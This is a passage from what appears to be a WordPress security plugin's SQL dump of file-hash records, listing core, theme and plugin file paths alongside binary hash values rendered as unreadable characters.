0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ �','',0,'?'),('�C��ؖS�8 �7ͺ�','wp-content/themes/healing-touch/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�W)�����6B���','�S�\0L*0$W{(������O4���\r','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�j4j�-<R%PT�}�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-editor-control.php',0,'�s s������','�s s������','=,do �`F�Tl���a�Ԋ �,�B��','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�Py�n','',0,'?'),('���R �(�, !)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('��K}{X��UG9<p�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�>�ᠼU��/G�@','��oyJ(B��f2H\'�h�!�\'* ɹ*��','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('���\r�C�N�$l(/','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/sections/section-doubled.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-YTOt�D��B��','���䣎���|R�$�\r���WO\0l6�EQ','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǣ�6Ӯ����H�pL','��A+l:#I�-A��5�J�iQ��ڙRW�w\0r�','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ �\"�/�','',0,'?'),('���v�t����c^��','wp-content/themes/weblog/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0��g t�SV,�','H��v��@���i��g!&��:F�)<��� /','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[II�[�I#i��','<�C~��-.�\0��9q�\\��}�)���~�[$','',0,'?'),('�� �ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR ]','',0,'?'),('�#���N�d\'(��\\��\0','wp-content/themes/advance/inc/kirki/assets/js/controls/select.js',0,'�+4��C� A233)P�','�+4��C� A233)P�','˄ ��,���A�Ć\0?�l�س��&�C4�','',0,'?'),('�(�gE�\ZeSt��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/selectize/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_/C�V�z�Y\'�@�.','@b{r�_R�V�cQ�ϓE��N�1���','',0,'?'),('�(������]dJ\rl','wp-content/plugins/wp-cerber/cerber-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ�9Twu*�Ҳ�i','��v� %Kj���\\J��/��՝mRb��X','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�K���4�7\'�Rh?�','wp-content/themes/twentytwenty/readme.txt',0,'��Baĸ�Y��~ϟ��','��Baĸ�Y��~ϟ��','\\װ��c_AX�C�^���`\\{\Z,�t','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�Ƽz�g�L���','��t�Mp���Q�8=��~bw����/���','',0,'?'),('����i$��5kN��)','wp-content/themes/doctors/core/customizer/help/_text_color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a),��\'����^','�ʖ��!��G\n��< Vi�譸wq�I','',0,'?'),('��8�,��tj�-��5','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/sections/recommended-actions/recommended-actions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5�BE��U��T��','0�d����\'�W*����mW�\r>��h�jg~�','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('�����(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('��J�$R��_���o�','wp-content/plugins/wp-cerber/assets/flags/lk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m ���t�����','vl�a��tb�N���u�G�:���<?�7�=','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a`|��^(=`��hv','L�.X_ �DJ��tk��H��!|��ݔJ��x','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�c��D���o� ','|�!��^(��^�~���c��m\Z/^f�[','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/# �Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�,�t��!O\0�PR���|','wp-content/plugins/redirection/images/GitHub-Mark-64px.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�\',_�Jm�M>KŽ','/\rTAY��م��ѻ���v�g�>�!Eh','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�-�c3�v\"}��_�','wp-content/themes/healthcare/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�zE���i�N��','z�,4�l���4(���\"\'m��{��V��(��u','',0,'?'),('�6�+�������e�GX�','wp-content/themes/healthcare/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~רw�߸�1�H',']3a��\'�K*J�1���nO�qb\'A�&ͭ\0�f.','',0,'?'),('�N��ZND��N�>Y ','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��[Ŕ��^�2��','��v�,�$.����b��߲���^�#n1�c�,','',0,'?'),('�X�2��YƗ߬���','wp-content/themes/vision-lite/css/theme-responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zb8���0�1\Z���','���զ\n��\Z*�F�V�Y-�pK��bx�[]��','',0,'?'),('�`�β$I}�>��_=','wp-content/themes/advance/inc/kirki/assets/js/controls/sortable.js',0,'h�R�1BV�d�a#�Q�','h�R�1BV�d�a#�Q�','��uH�VD��8���I1��N\"Ll�R�����','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��ʆ�wq��F��','R� j[�8ح�W����E�H��̅�a��I','',0,'?'),('��\Zqg<,�B x�#\r�','wp-content/themes/doctors/core/includes/dynamic.css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��j��u�Q�����','�#{������-.���>R<2�&� �_p���','',0,'?'),('��H>f�v�\'��]cX','wp-content/themes/doctors/core/customizer/help/_background_color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�(��J#\0�w��Q�','�.�Ӏ�K��r ���\Zݰb��|�Z�8���','',0,'?'),('���1�����!\r��','wp-content/themes/healthcare/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0Gx�\"I��L\'','gƔb*�\\���7OZ�/�~���U��؏�b','',0,'?'),('��뻛Ib�,6�Y+�8:','wp-content/themes/twentynineteen/sass/typography/_copy.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�L�ر^��#*��s','+�\\��`F���~���)?���9G�}B1��','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('��Q)��;�X^�҂�','wp-content/themes/healthcare/bootstrap/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r\r�M�2��%���','Iu�7;��)2���ʕ+ۑ>��M�Q٤�r�','',0,'?'),('��@&}\'Uՙ�U���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/layouts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǿ\"�,M`�>��A�','S��io�MH*p<a�ߟb�ݡ@k�R�;̐�','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ո�8��>�R�n�e',']1�9{k��P�f�6з�ɏj�WI� \n','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�M�\Z�`�y�rd���','wp-content/themes/doctors/core/home/blocks/slideshow/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k(n֭}��z��]�h','_�;�T��ʗ�Fnۊ4�}���J���V����\"','',0,'?'),('�d�!���\'�^G<�p:','wp-content/themes/skt-toothy/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��nO5���?#�W.�','E���$�N�.�v5��\ZCvg�=!_B_R�','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Fɠm(��nJ��ZEG','�S�5��X��9������mOX�>s��l��','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�l�`�c�%�C��&��;','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/fontawesome/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ī��lc2�=��N','����~^�<J���(���^,V��U���HhJ��','',0,'?'),('�o/N���t$�$���|','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��RXjJw�E��','��O�V�P�K��Lѐ��(Е�#uu.�','',0,'?'),('��!�>��D-9�f^�','wp-content/themes/healthcare/css/font-awesome/scss/_core.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ϝ��[w�hPw�','�ƚ����8~����W*T������D�>u�','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t��\"N��+�՛L�','�67�E0�܃�ՐC�{\\a�dPb�2�+�pW;P�','',0,'?'),('�����w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('����S�D��~��p�v','wp-content/plugins/wp-cerber/assets/bn3ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\n`ehG�����}�','Ul,��/��g����Qg�\'��� �I�&','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��y\Z�pK�3����`,','\\\r�$��D�Tl�b��ANĄH�\"ݷ����8','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�Ss�li4��l1�','O[�~_uO�\r�i�e�s�^��ޘ���!��\nyK=','',0,'?'),('���� ��*Q��^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c\'[�g`.Ƿ{k','�{K��.(��\Z�\0����<��!rv�+=8���','',0,'?'),('��3T,�M�� nÀ�4�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@ۓb�����hX�','�ڊ�j�9�y���v\n�oC/�`��ny','',0,'?'),('��b��֏�� �$;�h','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�Vr�|HH�','���Ҵ?5��n���P6ֆ�>�{\0-x��e','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W� ��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��/���c�','�8�OG�I%��(�n6�)�lhf6f��','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6qigV�+�\'�^�N�','�����Bi�B�\rv�\rM5���\n9\'�d��р9�','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�g�ӨH7\ng��3L','wp-content/themes/twentytwenty/assets/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ln��>�+�M��,','!�7U�`���^��:��8��o�_: � ','',0,'?'),('�u��<e�x��@ֈ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >��>��S����b�%',' ʍ��LM> �ύ��5́kv��k�PHɇ0','',0,'?'),('�zub�d��3��_T�?','wp-content/plugins/wp-cerber/cerber-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2?�f\\�~��1�D�','�+ ���+�6U��TRO�m�E�?<|�K�\nL','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!n�ΟӾ�)�X�','��aA=�M��X�绚����4#��A�iΡ\r���c','',0,'?'),('�����,/r�]��1S','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('��;��K�P[�լ���','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u$���N����\r6','��Y0��hb_�%��/��_1�$Z�~xψ','',0,'?'),('��q��<8�m�ꔟ','wp-content/themes/wp-barrister/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�R��|*m�bT�=N','���v��{;ft]�B�pV�;y���fCj�','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OSSfb��\r�E捵�','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('�_��S�ަ�:{j�}','wp-content/plugins/wp-cerber/assets/flags/do.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���*{\0�4��sV','\n�/�H��Ҿ/���\\����-ܧ��Rx�','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m����{d�X��',')\\k���:Es�%vn�6Z�R\ng�N*1D��)&�','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�H駖�P�at �V�\'e','wp-content/plugins/redirection/redirection-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�k\\4��48�e|','�t��Q�4�0o���&\Z\"\'��V�����K�UaQ','',0,'?'),('�V[s)R��@3,®�','wp-content/plugins/redirection/locale/json/redirection-es_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�w��M�j�^*@�','$�O\"�4�:���÷��<��{���mbP���6�','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ͳ���k�o�T��A=','�ӵ�f�K��N�_β�s:�v%�Y=����','',0,'?'),('�\\���ȷLy���','wp-content/themes/weblog/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s7`����P��,','�����t���jnq�\"��ti�T�pϽ�e��','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�tfF �r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o�H?6\Z���x','(����%�����C��㏞�d�\"��A��','',0,'?'),('��/o?a���F�~.��','wp-content/themes/doctors/images/demo/user_1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4>�.�8�\r�@tH','ᱏ5��\"t{�{_��&�W~���]}��h�� ','',0,'?'),('�Ŏ��O�NJ�`','wp-content/plugins/all-in-one-wp-security-and-firewall/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��J�r�x^�Y�\Z�','wp-content/themes/doctors/core/contents/loop_attachment/attachment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,8�u��t|','�0\0���e��&b�t�M8ڝ6nL�T!�<�q','',0,'?'),('�\n�ot}l�!E�`I','wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\0�\\��n�+��Ö','ƌ�%{�cUkw��\r��^p%���$L�`��','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('�\rĞ\"Fl~��\\^�C','wp-content/themes/weblog/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�\rPC��\"d','}밝�e��<��(��>/<B�T���vyW�Xx','',0,'?'),('������/�n����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r]��^g��\Z�/]T��','�y�涩�x���Ƞa}���s矛���+�br)','',0,'?'),('�!�-LHv�)��n��#','wp-includes/https-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�5\\�r���(�W','W�|�_`|\\��y{4�N���Vp����j[','',0,'?'),('�(�`hqQ`~�X��','wp-content/plugins/redirection/matches/login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�;Ψʲ�9�ZB','��P�jz�8����<�^e%�kE�ϋ���u C�','',0,'?'),('�:�z�\"���Y�D�&','wp-content/themes/healing-touch/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�w%_8�/+�ֻ�','���y���� bm,RQ�͵�w�_�mr��vO�#l','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('�PC<�� ���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�) ~����ܖݟr','',0,'?'),('�^4�x#�J#��','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-checkbox.php',0,'��A/����v��','��A/����v��','CX��%�.�wC���TA6B<�\"w���c�5� l','',0,'?'),('�a�\\\r��S����[','wp-content/themes/weblog/acmethemes/customizer/design-options/background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�8S}�Y����R�3','�� ^��̯\0�#ᵅ�{l��{F{]F�|�c','',0,'?'),('�a$C*�!�r�\ZI]\\;�','wp-content/themes/regina-lite/layout/js/plugins/skip-link-focus-fix/skip-link-focus-fix.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�msx~\\������t9','�i=���;\'��o�Z������-���?��Z','',0,'?'),('�gvҼ\0���۰�j-��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/selectize/selectize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YI����U���9��','�o1�_��fx�ߖ���B�7�<��jdRL�z,','',0,'?'),('�m�CB.ե�>F_�#','wp-content/themes/twentynineteen/sass/media/_galleries.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�md��~����','�6�!1oAu�Eo���Fw�9\n4\0�\\%wM�\r�g','',0,'?'),('�p>^���y��+���','wp-content/themes/doctors/core/contents/loop_post/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�i�kl8�?�~�-m','�F�H=���jd1`UsQ]�G`z��%��tt','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�%?b�����~\0','o~!��A3V�x|�t�;�\'�3�-�I�\n�','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��p��C�!�Ԑ,','�����\0�\nIP�t}3RΘ/#����A�','',0,'?'),('���:T�L�5�EF�Vc','wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�v_�`���n�/T','�P��s\'\n�B��KM$꼓rfy6yݵ[���e','',0,'?'),('��@Fw�S7�_��I��=','wp-content/themes/doctors/core/customizer/help/help_function.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͂JE�q_����','�ЗH�DxO���X2��\n��q�6]�z�䱬�','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\na�g/�H��2*�e','n�R��Z�,�7G\'���fͺi߶� �+!c��','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙ���~��M♸�','IoT�]��j�J��~�ď�7bn!M|��!F��','',0,'?'),('��� ]�LF�ҹܽ�','wp-content/themes/skt-toothy/css/nivo-slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0o])�����o�vj�','�^��\"0��*��\Z�sl�K�V���&~:�','',0,'?'),('��&L�|����b��','wp-content/themes/doctors/core/contents/loop_templateSitemap/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZS-�.��G|J\"5','�Q�A.V�i��#\r�RJ���i.7�@B��d�','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�)Sl�W)�l�h�J\'.','wp-content/plugins/wp-cerber/assets/flags/me.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{H`C��~���^8�X','��&�P�-urk�P�����\"~aZ��ޢ�','',0,'?'),('�-��+ƫ�!nKe','wp-content/themes/healthcare/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �y�jSyL��}�3�','_}�!ƭQ~�M�%$�m� 